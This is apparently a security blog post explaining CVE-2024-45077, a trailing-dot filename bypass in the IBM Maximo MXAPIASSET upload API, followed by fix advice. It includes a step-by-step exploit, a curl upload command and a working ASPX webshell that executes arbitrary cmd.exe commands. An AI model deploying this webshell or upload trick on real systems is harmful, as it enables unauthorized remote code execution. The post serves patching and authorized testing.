CVE-2024-45077 - How IBM Maximo Asset Management 7.6.1.3's MXAPIASSET API Can Be Exploited via Simple File Upload Trick

In mid-2024, a serious vulnerability (CVE-2024-45077) was discovered in IBM Maximo Asset Management version 7.6.1.3, specifically within its MXAPIASSET REST API. This flaw allows authenticated, low-privileged users to upload what should be restricted files—such as scripts or executables—using a simple trick well-known among penetration testers.

The vulnerability’s root? It’s all about Windows "ignoring" trailing dots in file names—a classic quirk that modern web software still sometimes overlooks.

This post explains the details of CVE-2024-45077, shows how easy it is to abuse, and gives you enough info to test your own Maximo instance (responsibly).

TL;DR

If you’re running IBM Maximo Asset Management 7.6.1.3 on Windows, and you expose the MXAPIASSET REST endpoint, your users can upload dangerous file types by simply putting a dot at the end of the filename. For example: malicious.aspx.

What’s the Vulnerability?

The MXAPIASSET REST API provides an interface for users to upload asset-related attachments, including files. While Maximo tries to block files with dangerous extensions like .exe, .jsp, or .aspx, it fails when the filename has a dot at the end—for example:

evil.aspx. (note the trailing dot)

On Windows file systems (NTFS/FAT), a filename ending in a dot is normalized: Windows sees evil.aspx. as evil.aspx.

Result: The application checks the filename as it is uploaded (evil.aspx.), sees no dangerous extension, and allows it. Windows then drops the dot, storing it as evil.aspx—fully executable for a Windows IIS server, for example.

Original References

- IBM Security Bulletin: CVE-2024-45077 _(Check IBM’s website for official fix status)_
- Microsoft Docs – Naming Files, Paths, and Namespaces
- Common Windows File Upload Tricks

Step 1: Log In With Low Privileges

Any user with minimal rights—just enough to access the Maximo REST API and create or update assets—can exploit this.

The typical path looks like this

POST /maximo/oslc/os/mxapiasset/{assetID}/attachments

Authentication (via API token or session cookie) is required.

Step 3: Craft the Malicious Upload

Suppose you want to upload an aspx webshell for later use. Normally, the .aspx extension is blocked.

But upload your file as shell.aspx., and it will slip through.

Example cURL code

curl -k -X POST "https://maximo.example.com/maximo/oslc/os/mxapiasset/1234/attachments";
  -H "maxauth: <Base64-Encoded-User:Pass>"
  -F "file=@shell.aspx.;type=application/octet-stream;filename=shell.aspx."

Step 4: Maximo Saves the File… with No Extension Filtering

The server cheerfully stores your file as shell.aspx (on disk), because Windows removes the dot post-upload.

If the server's upload folder is web-accessible (as it often is, for attachments), your malicious .aspx file is now present and *executable*.

Go to

https://maximo.example.com/maximouploads/shell.aspx

If you uploaded a webshell, congratulations—you have code execution!

Here's a sample minimal ASPX webshell for testing

<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) { 
    System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
} %>

Save it as shell.aspx., then upload via the API.

Security controls are completely bypassed.

If you try this on Linux, it *won’t* work—Linux will store the file exactly as given (shell.aspx.), and web servers won't run it as ASPX.

Result: Upload and remote execution of restricted file types

If you let users upload files through Maximo’s REST API, and your upload directory is web-accessible, your system is at risk.

How to Fix

IBM has patched this in newer versions. The fix is simple: strip or reject filenames ending in a dot or space. For defense-in-depth:

Always store uploaded files outside the web root

- Block dangerous extensions, including those with trailing dots/spaces

Sanitize ALL filenames at upload

Patch Link: IBM Security Bulletin

Testing and Responsible Disclosure

Only test on systems you own or have explicit permission to assess. Discovered this on a live environment? Contact your security team (and IBM).

Conclusion

CVE-2024-45077 is shockingly trivial to exploit, thanks to a decades-old Windows trait. Even mature, enterprise products can slip up on edge-case filename handling.

If you use Maximo Asset Management on Windows, update ASAP. Until you do, review and restrict upload permissions, or disable the MXAPIASSET REST API.


Stay Safe. For more reading, check the Ubuntu security team’s excellent guidance on file uploads and keep your software patched.

References

- IBM Security Bulletin
- Microsoft: File and Directory Names
- File Extension Bypass Techniques (HackTricks)

Timeline

Published on: 01/24/2025 16:15:36 UTC